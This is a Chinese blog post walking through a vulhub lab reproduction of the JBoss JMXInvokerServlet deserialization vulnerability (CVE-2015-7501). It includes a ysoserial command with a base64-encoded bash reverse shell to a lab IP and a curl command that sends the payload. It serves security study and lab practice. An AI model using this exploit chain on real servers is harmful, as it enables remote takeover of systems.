【vulhub】JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)复现

最新推荐文章于 2024-05-07 09:08:52 发布
最新推荐文章于 2024-05-07 09:08:52 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: vulhub 文章标签: Jboss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/115726163
版权

漏洞描述

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

复现过程

这里使用6.1.0版本

1.1启动环境

docker-compose up -d

在这里插入图片描述

1.2漏洞探测

http://192.168.100.34:8080/invoker/JMXInvokerServlet

此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。访问若提示下载 JMXInvokerServlet,则可能存在漏洞。
在这里插入图片描述

1.3编写反弹shell的命令

我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。
(注意反弹的ip和端口)

编——码

在这里插入图片描述
序列化数据生成
使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4zNC8yMjMzIDA+JjE=}|{base64,-d}|{bash,-i}" >exp.ser

执行了上面那条命令后,会生成我们的序列化数据
在这里插入图片描述
再把我们的生成的序列化数据,以二进制的方式发送,–data-binary(二进制方式)

curl http://192.168.100.34:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

在这里插入图片描述

成功反弹

在这里插入图片描述

还有第二种方法,只需要3条命令就可以了

请看【vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞(CVE-2017-12149)复现
在这里插入图片描述

最后介绍一下直接使用工具吧

打开我们的 java反序列终极化工具.jar 工具,选择jboss,输入目标主机的链接,点击目标信息,获取信息。等五六秒的样子,如果能出来目标主机的信息,则说明目标主机存在漏洞。如果没漏洞,会直接提示不存在漏洞,我们等待他的响应即可。
在这里插入图片描述

参考文章
利用JBoss漏洞拿webshell方法
Jboss相关漏洞
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)

樱浅沐冰
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
vulhubjboss(CVE-2017-12149)
最新发布
weixin_56306210的博客
05-07 202
vulhubjboss(CVE-2017-12149)
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501CVE-2017-12149)
来到了学渣的博客
08-29 4956
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell反弹不回来。 步骤: 发现漏洞指纹→反弹shell进行编码→用ysoserial把编码好的反弹shell生ser文件→启动监听→用curl或
JBOSS 反序列化CVE-2015-7501复现
weixin_63124284的博客
10-24 1269
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6671
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501
黑白的博客
12-21 2016
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
JBoss JMXInvokerServlet 反序列化漏洞
Kevin's Blog
06-08 2527
一、漏洞介绍 1.1 漏洞简介   经典的JBoss反序列化漏洞JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象存在反序列化漏洞。 1.2 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至。
07-08 1698
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBoss漏洞 - CVE-2010-0738 CVE-2015-7501
HAKUNAMATATATTA的博客
12-13 1786
CVE-2010-0738 CVE-2015-7501 漏洞复现
JBoss中间件漏洞总结
weixin_42345596的博客
08-27 1286
一.Jboss简介 Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080 二.Jboss安装 下载地址:https://jbossas.jboss.org/downloads/ 1.安装jdk 这里用了两台机子,一台安装老版本J
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
JBoss JMXInvokerServlet 反序列化漏洞复现(CVE-2015-7501)
wutiangui的博客
09-11 331
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用。
JMX】8. JBoss中的JMX实现
Alpha's 学习笔记
03-21 2467
前面都是用JDK自带的JMX实现来写的MBean,JMX的实现不独SUN一家,JBOSS也有自己的JMX实现。如果你使用JBOSS来做WEB服务器,那么基于JBOSS的实现来写MBean,是一个不错的选择。基于JBoss的MBean和基于SUN的MBean有什么不同吗?有一些不同之外,但绝大部份都一样。     HelloWorld实例 1、准备工作   JBOSS实现了
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3837
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 628
vulhub漏洞复现-jboss反序列化漏洞
vulhub漏洞复现79_Jboss
weixin_44193247的博客
02-16 1611
vulhub漏洞复现练习篇
jboss反序列化漏洞
08-16
JBoss反序列化漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java反序列化错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致漏洞的出现。攻击者可以利用此漏洞发送特制的请求,通过发送包含恶意序列化数据的POST请求到`/invoker/readonly`路径,实现远程代码执行的攻击。这个漏洞可以在JBoss 5.x和6.x版本中被利用。如果访问`http://ip:端口/jbossmq-httpil/HTTPServerILServlet`出现相关页面,就可能存在该漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jboss反序列化漏洞](https://blog.csdn.net/weixin_48776804/article/details/116919336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [JBOSS反序列化漏洞](https://blog.csdn.net/weixin_52206305/article/details/125534761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值